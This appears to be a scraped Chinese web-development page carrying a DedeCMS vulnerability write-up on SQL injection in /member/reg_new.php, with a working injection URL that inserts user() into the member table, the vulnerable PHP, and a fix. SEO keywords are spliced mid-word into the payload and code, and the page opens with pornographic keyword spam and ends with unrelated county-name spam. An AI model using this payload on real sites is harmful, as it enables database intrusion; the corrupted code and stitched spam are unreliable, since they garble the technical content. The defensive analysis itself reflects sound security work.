久久机这里只有精品,国产69精品一区二区亚洲孕妇,91精品国产综合久久婷婷香蕉,午夜久久久久久电影

網(wǎng)站建設,程序開發(fā)一站式技術服務平臺!
網(wǎng)站建設SEO優(yōu)化聯(lián)系方式
最新活動:電腦PC端+手機端+微網(wǎng)站+自適應網(wǎng)頁多模板選擇-建站388元起價!!!
當前位置:主頁 > 網(wǎng)站建設 > dedecms織夢 /member/reg_new.php SQL注入漏,織夢教程

dedecms織夢 /member/reg_new.php SQL注入漏,織夢教程

時間:2023-07-17 11:07:17 閱讀: 文章分類: 網(wǎng)站建設 作者: 織夢網(wǎng)站員

導讀:織夢教程織夢教程1. 漏洞描述 Dedecms會員中心注入漏洞 2. 漏洞觸發(fā)條件 http://127.0.0.1/dedecms5.7/member/reg_new.php織夢cms模板dede模板堂。

織夢cms模板dede模板堂1. 漏洞描述   Dedecms會員中心注入漏洞   2. 漏洞觸發(fā)條件 /member/reg_new.php?dopost=regbase&step=1&mdede模板安裝type=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpw織夢模板免費d=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('個人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree= //把vdcode=slum改成當前的驗證碼 3. 漏洞影響范圍   4. 漏洞代碼分析   /member/reg_new.php .. $jointime = time(); $logintime = time(); $joinip = GetIP(); $loginip = GetIP(); $pwd = md5($userpwd); $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0); //未對$mtype、$safeanswer、$safequestion進行有效過濾就帶入SQL查詢 $inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores', '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; if($dsql->ExecuteNoneQuery($inQuery)) .. 5. 防御方法   /member/reg_new.php .. $jointime = time(); $logintime = time(); $joinip = GetIP(); $loginip = GetIP(); $pwd = md5($userpwd); /* 對$mtype、$safeanswer、$safequestion進行有效過濾 */ $mtype = HtmlReplace($mtype,1); $safeanswer = HtmlReplace($safeanswer); $saf織夢文章模板equestion = HtmlReplace($safequestion); /* */ $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0); $inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores', '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; if($dsql->ExecuteNoneQuery($inQuery)) { ..

關鍵詞標簽: 標簽 織夢 標題

聲明: 本文由我的SEOUC技術文章主頁發(fā)布于:2023-07-17 ,文章dedecms織夢 /member/reg_new.php SQL注入漏,織夢教程主要講述標簽,標題,織夢網(wǎng)站建設源碼以及服務器配置搭建相關技術文章。轉載請保留鏈接: http://www.bifwcx.com/article/web_28641.html

我的IDC 網(wǎng)站建設技術SEOUC.COM
專注網(wǎng)站建設,SEO優(yōu)化,小程序設計制作搭建開發(fā)定制網(wǎng)站等,數(shù)千家網(wǎng)站定制開發(fā)案例,網(wǎng)站推廣技術服務。
  • 5000+合作客服
  • 8年從業(yè)經(jīng)驗
  • 150+覆蓋行業(yè)

    • 最新熱門源碼技術文章

    主站蜘蛛池模板: 兰溪市| 泰宁县| 通海县| 哈巴河县| 广昌县| 于田县| 洛隆县| 台东市| 临沧市| 彰化县| 安岳县| 绥芬河市| 广灵县| 盐津县| 全南县| 承德市| 青铜峡市| 阜城县| 施甸县| 天祝| 咸丰县| 丰原市| 土默特左旗| 崇明县| 潜江市| 宜兰市| 阿勒泰市| 阜康市| 二连浩特市| 收藏| 琼中| 教育| 会宁县| 微博| 中山市| 双峰县| 东乌珠穆沁旗| 武宣县| 郎溪县| 柳河县| 察雅县|